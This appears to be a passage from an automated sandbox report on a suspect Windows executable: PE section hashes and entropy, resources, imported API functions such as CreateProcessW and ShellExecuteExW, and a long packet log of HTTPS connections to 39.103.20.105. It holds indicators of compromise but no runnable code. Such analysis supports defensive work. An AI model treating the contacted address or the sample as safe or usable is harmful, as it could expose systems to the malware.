                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d7b0000x630.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x165d00x54.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x166300x94.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xf0000x2a8.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000xd3500xd4008e41a9c5ed9a34feab50e2f6638c2d76False0.5641030365566038data6.363013225921282IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0xf0000x904e0x9200909112f6547c8c223b9d09d4e73580ceFalse0.4260755565068493data4.707335187064855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x190000x1d5ac680x1d58200ab2455c660e8e10120efea481bddb2e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata0x1d740000xcc00xe00f0027954b09b335b4fb4c14137971ffdFalse0.44363839285714285data4.49612119040806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .gfids0x1d750000xc40x200bdbf77d4bf01cbf4f15fd100a268f74cFalse0.21875Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary0.9798152519205301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x1d760000x4abc0x4c00c3521f000215b739b35a6f6b2ba17189False0.9590357730263158data7.924423626369639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1d7b0000x6300x8000c3c3adbfa1d7560de091d1d1029dad6False0.537109375data4.797113422033704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x1d761180x490dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9856692155499706
                                  RT_RCDATA0x1d7aa280x7cdataEnglishUnited States0.6370967741935484
                                  RT_RCDATA0x1d7aaa40x2dataEnglishUnited States5.0
                                  RT_GROUP_ICON0x1d7aaa80x14dataEnglishUnited States1.05
                                  DLLImport
                                  KERNEL32.dllGetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
                                  USER32.dllwsprintfW, MessageBoxW
                                  SHELL32.dllShellExecuteExW
                                  SHLWAPI.dllPathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 11, 2025 04:35:25.722207069 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:25.722248077 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:25.722388029 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:25.736849070 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:25.736865997 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:26.982563972 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:26.982732058 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:26.983669996 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:26.983782053 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.034369946 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.034384966 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.034845114 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.034919977 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.036411047 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.079372883 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.381342888 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.381432056 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.381556988 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.387659073 CET49914443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.387676954 CET4434991439.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.498945951 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.498994112 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:27.499250889 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.499250889 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:27.499294043 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:28.753256083 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:28.753365993 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:28.753942013 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:28.753950119 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:28.754158020 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:28.754163980 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.072421074 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.072441101 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.072475910 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.072485924 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.072499037 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.072535038 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.072977066 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.073033094 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.074389935 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.074454069 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.078341007 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.078399897 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.161598921 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.161672115 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.161856890 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.161917925 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.161967039 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.162019968 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.162787914 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.162842989 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.163517952 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.163578033 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.163844109 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.163901091 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.165539980 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.165600061 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.165945053 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.166001081 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.167655945 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.167717934 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.209709883 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.209835052 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.250977993 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.251080990 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.251132011 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.251187086 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.251379967 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.251429081 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.251522064 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.251571894 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.251893044 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.251945972 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.252090931 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.252142906 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.252289057 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.252345085 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.252449036 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.252507925 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.252949953 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.253011942 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.253269911 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.253334045 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.253448009 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.253501892 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.254731894 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.254796028 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.254945993 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.254997015 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.256707907 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.256769896 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.298957109 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.299055099 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340158939 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340296984 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340331078 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340352058 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340384960 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340420961 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340539932 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340610981 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340704918 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340773106 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340780973 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340821028 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.340831041 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.340877056 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.360213995 CET49926443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.360229015 CET4434992639.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.392424107 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.392450094 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:29.392640114 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.392848969 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:29.392862082 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:30.658163071 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:30.658402920 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:30.658978939 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:30.658984900 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:30.659137964 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:30.659142971 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.128865957 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.128889084 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.128993034 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.129008055 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.129283905 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.129360914 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.129369020 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.129472971 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.132896900 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.132967949 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.135083914 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.135190010 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.217223883 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.217289925 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.217401028 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.217401028 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.217412949 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.217524052 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.217726946 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.217736006 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.217825890 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.218106031 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.218214989 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.219388008 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.219507933 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.219777107 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.219896078 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.221514940 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.221637964 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.221709967 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.221774101 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.223747969 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.223861933 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.225768089 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.225986958 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.305871964 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.305969954 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.305999041 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306010008 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306021929 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306042910 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306082010 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306082010 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306214094 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306453943 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306765079 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306837082 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306884050 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306894064 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.306906939 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.306957006 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.307431936 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.307897091 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.307914972 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.307921886 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.307959080 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.308103085 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.308168888 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.308281898 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.308346033 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.308514118 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.308717966 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.309217930 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.310050964 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.310198069 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.310225010 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.310234070 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.310254097 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.310436964 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.312156916 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.312247992 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.312306881 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.312376022 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.314469099 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.314554930 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.314640999 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.314702988 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.314723015 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.314810991 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.363620043 CET49941443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.363641024 CET4434994139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.411690950 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.411741018 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:31.412139893 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.412139893 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:31.412178993 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.654437065 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.654514074 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.655241966 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.655257940 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.655407906 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.655415058 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.982774019 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.982800007 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.982837915 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.982851028 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.982866049 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.982911110 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.983465910 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.983587027 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984592915 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.984643936 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984652042 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.984668016 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.984695911 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984726906 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984875917 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984889984 CET4434995239.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.984901905 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.984936953 CET49952443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.997035027 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.997068882 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:32.997148991 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.997298956 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:32.997312069 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.267652035 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.267739058 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.268146992 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.268157959 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.268311024 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.268316984 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595182896 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595211029 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595285892 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.595324993 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595341921 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.595370054 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.595581055 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595633984 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.595787048 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.595843077 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.831022024 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.831173897 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.831262112 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.831305981 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.831865072 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.831914902 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.832073927 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.832122087 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.832842112 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.832890987 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.833487034 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.833550930 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:34.833656073 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:34.833699942 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.067117929 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.067203045 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.067243099 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.067300081 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.067641973 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.067709923 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.068038940 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.068157911 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.068301916 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.068357944 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.068866968 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.068934917 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.069004059 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.069050074 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.069755077 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.069814920 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.069941044 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.069987059 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.070130110 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.070174932 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.070777893 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.070825100 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.071006060 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.071053028 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.071724892 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.071806908 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.071882963 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.071938038 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292001009 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.292071104 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292126894 CET4434996139.103.20.105192.168.2.4
